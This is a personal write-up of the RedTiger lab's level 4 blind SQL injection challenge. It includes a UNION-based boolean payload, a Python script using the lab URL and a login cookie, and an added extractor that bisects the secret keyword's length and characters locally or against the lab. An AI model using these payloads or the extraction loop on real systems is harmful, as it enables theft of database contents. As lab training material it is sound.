(First time using requests.get, and first time blind-injecting a field value by its length. If I forget this later I can come back and forget it again.)
The hint says blind injection. Clicking "click me" sends a GET with ?id=1, and the number of rows returned is echoed in "Query returned i rows." Right now it shows 1 row.
Try id=1 union select 1,2 from level4_secret # : the page now says 2 rows, so a WHERE clause with a boolean condition can be appended after the UNION and the row count acts as the oracle.
Build the payload:
1 union select 1,2 from level4_secret where [bool] #
Put a boolean expression in [bool]: when it is true the UNION contributes a second row ("Query returned 2 rows."), when it is false only the original row comes back. Binary search over ascii() of each character (and first over length()) needs about 7 requests per character instead of up to 95.
The script:
import requests

url = 'http://redtiger.labs.overthewire.org/level4.php'
flag_true = 'Query returned 2 rows.'   # shown only when the injected WHERE is true
result = ''
cookies = {'level4login': 'put_the_kitten_on_your_head'}

for i in range(1, 22):   # range is half-open; the keyword is 21 characters (found with the length check below)
    # the length run used high = 50, low = 0 as the search bounds
    high = 127   # printable ASCII for the character search
    low = 32
    mid = (high + low) // 2
    while high > low:
        # step 1, field length (gives 21):
        # cond = "length((select keyword from level4_secret))>{}".format(mid)
        # step 2, one character at a time; the double parentheses around the subquery are required
        cond = "ascii(mid((select keyword from level4_secret),{index},1))>{char}".format(index=i, char=mid)
        payload = "1 union select 1,2 from level4_secret where {boolean} #".format(boolean=cond)
        data = {'id': payload}
        response = requests.get(url=url, params=data, cookies=cookies)
        if flag_true in response.text:   # keyword[i] > mid, search the upper half
            low = mid + 1
        else:                            # keyword[i] <= mid, search the lower half
            high = mid
        mid = (high + low) // 2
    print("i=" + str(i))
    # result += str(mid)   # use this instead of chr() when running the length check
    result += chr(mid)
    print(result)

print("output:" + result)
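Added example (not the original writeup's script): the same attack generalised so the oracle is one function that answers "did the injected condition hold?". The binary search then finds the keyword length first and each character after that, and can be pointed either at a local SQLite stand-in (constructed schema and a constructed 21-character sample secret, so it runs offline; SQLite needs substr/unicode and a "--" comment where MySQL uses mid/ascii and "#") or at the lab over HTTP. The table and column names, the GET parameter, the cookie and the "Query returned 2 rows." marker are taken from this page; the schema of the news table, the URL handling and the sample secret are assumptions.

```python
"""Boolean-based blind SQLi extraction: length first, then each character by bisection.

Added example, not the original post's code.  Assumptions: level4_secret.keyword exists
as the page says; the row-count oracle (2 rows vs 1 row) is the one the page describes;
the local SQLite schema and SAMPLE_SECRET are constructed here for offline testing.
"""
import sqlite3
import urllib.parse
import urllib.request
from typing import Callable

Oracle = Callable[[str], bool]   # takes a SQL boolean expression, returns True if it held

# Constructed sample secret, 21 characters like the lab's (the real value is not on this page).
SAMPLE_SECRET = "blind_sqli_sample_key"

# The two conditions the page uses, per dialect.  The lab is MySQL (mid/ascii, '#' comment);
# SQLite only has substr/unicode and '--' comments, so the local copy differs there.
DIALECTS = {
    "mysql": {
        "length": "length((select keyword from level4_secret))>{n}",
        "char": "ascii(mid((select keyword from level4_secret),{i},1))>{c}",
        "comment": "#",
    },
    "sqlite": {
        "length": "length((select keyword from level4_secret))>{n}",
        "char": "unicode(substr((select keyword from level4_secret),{i},1))>{c}",
        "comment": "--",
    },
}


def make_sqlite_oracle(secret: str = SAMPLE_SECRET) -> Oracle:
    """Local stand-in for the vulnerable page: runs the page's payload shape against
    an in-memory database (constructed schema: a 2-column news table plus the secret)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer, title text)")
    conn.execute("insert into news values (1, 'click me')")
    conn.execute("create table level4_secret (keyword text)")
    conn.execute("insert into level4_secret values (?)", (secret,))

    def oracle(cond: str) -> bool:
        payload = f"1 union select 1,2 from level4_secret where {cond} {DIALECTS['sqlite']['comment']}"
        # String interpolation of the id is the bug the lab models; never do this in real code.
        rows = conn.execute(f"select id, title from news where id = {payload}").fetchall()
        return len(rows) == 2          # 2 rows <=> the injected WHERE held
    return oracle


def make_http_oracle(url: str, cookie: str, flag_true: str = "Query returned 2 rows.") -> Oracle:
    """Oracle against the lab itself (assumes GET ?id= and the cookie exactly as on the page)."""
    def oracle(cond: str) -> bool:
        payload = f"1 union select 1,2 from level4_secret where {cond} {DIALECTS['mysql']['comment']}"
        req = urllib.request.Request(url + "?" + urllib.parse.urlencode({"id": payload}),
                                     headers={"Cookie": cookie})
        with urllib.request.urlopen(req) as resp:
            return flag_true in resp.read().decode(errors="replace")
    return oracle


def bisect_value(greater_than: Callable[[int], bool], low: int, high: int) -> int:
    """Return v in [low, high] given an oracle answering 'is v > x?'; ~log2(high-low) queries."""
    while low < high:
        mid = (low + high) // 2
        if greater_than(mid):
            low = mid + 1
        else:
            high = mid
    return low


def find_length(oracle: Oracle, dialect: str, max_len: int = 64) -> int:
    d = DIALECTS[dialect]
    return bisect_value(lambda n: oracle(d["length"].format(n=n)), 0, max_len)


def extract_keyword(oracle: Oracle, dialect: str, length: int) -> str:
    d = DIALECTS[dialect]
    chars = []
    for i in range(1, length + 1):              # SQL string positions are 1-based
        code = bisect_value(lambda c, i=i: oracle(d["char"].format(i=i, c=c)), 32, 127)
        chars.append(chr(code))
    return "".join(chars)


def count_queries(oracle: Oracle):
    """Wrap an oracle so the number of requests (the cost of the attack) can be reported."""
    counter = {"n": 0}

    def counted(cond: str) -> bool:
        counter["n"] += 1
        return oracle(cond)
    return counted, counter


if __name__ == "__main__":
    oracle, stats = count_queries(make_sqlite_oracle())
    n = find_length(oracle, "sqlite")
    print("length:", n, "keyword:", extract_keyword(oracle, "sqlite", n), "queries:", stats["n"])
    # Against the lab: oracle = make_http_oracle("http://redtiger.labs.overthewire.org/level4.php",
    #                                            "level4login=put_the_kitten_on_your_head")
    # then find_length(oracle, "mysql") and extract_keyword(oracle, "mysql", n).
```

Running it offline prints the 21-character sample in roughly 150 queries (about 7 per character plus 7 for the length), which is the point of bisecting on ascii() instead of testing each printable character in turn. Swapping in make_http_oracle and the "mysql" dialect gives the same loop as the script above, with the length check no longer commented in and out by hand.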
Postscript: EDG rules! Let's go Navi!